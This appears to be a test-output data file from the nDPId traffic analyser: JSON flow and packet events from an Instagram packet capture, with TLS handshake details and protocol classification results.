00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"}
00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1568796254515,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254515,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDOAbvBtYQbAAAAALAC\/\/9z6gAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254524,"flow_last_seen":1568796254524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254524,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1568796254524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254524,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDPAbv9TOkSAAAAALAC\/\/\/TUgAAAgQFtAEDAwYBAQgKDXB1VAAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM2mvmccAcaqT6ASbHDxzgAAAgQFeAQCCAoU9Z3GDXB1TAEDAwg="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2075,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM6bGFkcwbWEHKASbHAfPgAAAgQFeAQCCArYQyzxDXB1TAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2076,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDNAbsBxqpPpr5nHYAQCAyEugAAAQEICg1wdVYU9Z3G"}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1568796254527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254527,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDOAbvBtYQcmxhZHYAQCAyyKQAAAQEICg1wdVbYQyzx"}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2078,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254514,"flow_last_seen":1568796254528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254528,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2080,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254515,"flow_last_seen":1568796254531,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254531,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2082,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1568796254536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254536,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM\/pQUID\/UzpE6ASbHCRrQAAAgQFeAQCCAoUEKcNDXB1VAEDAwg="}
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2083,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1568796254538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796254538,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDPAbv9TOkT6UFCBIAQCAwkmAAAAQEICg1wdV8UEKcN"}
00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2084,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796254524,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":419,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2088,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254514,"flow_last_seen":1568796254539,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":1568796254539,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2092,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254515,"flow_last_seen":1568796254543,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":529,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1568796254543,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2098,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1568796254524,"flow_last_seen":1568796254551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":1154,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1568796254551,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"fcb2d4d0991292272fcb1e464eedfd43","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7440000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908576,"flow_last_seen":1436720908733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1436720908577,"flow_last_seen":1436720908737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4627,"flow_avg_l4_payload_len":330,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}}
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1436720900687,"flow_last_seen":1436720901200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":46392,"flow_avg_l4_payload_len":799,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.162","src_port":57936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"}
00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254514,"flow_last_seen":1568796254514,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254514,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2070,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1568796254514,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254514,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDNAbsBxqpOAAAAALAC\/\/8NqAAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254515,"flow_last_seen":1568796254515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49358,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2071,"source":"instagram.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1568796254515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254515,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDOAbvBtYQbAAAAALAC\/\/9z6gAAAgQFtAEDAwYBAQgKDXB1TAAAAAAEAgAA"}
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796254524,"flow_last_seen":1568796254524,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796254524,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49359,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2073,"source":"instagram.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1568796254524,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796254524,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDPAbv9TOkSAAAAALAC\/\/\/TUgAAAgQFtAEDAwYBAQgKDXB1VAAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2074,"source":"instagram.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1568796254526,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796254526,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wM2mvmccAcaqT6ASbHDxzgAAAgQFeAQCCAoU9Z3GDXB1TAEDAwg="}
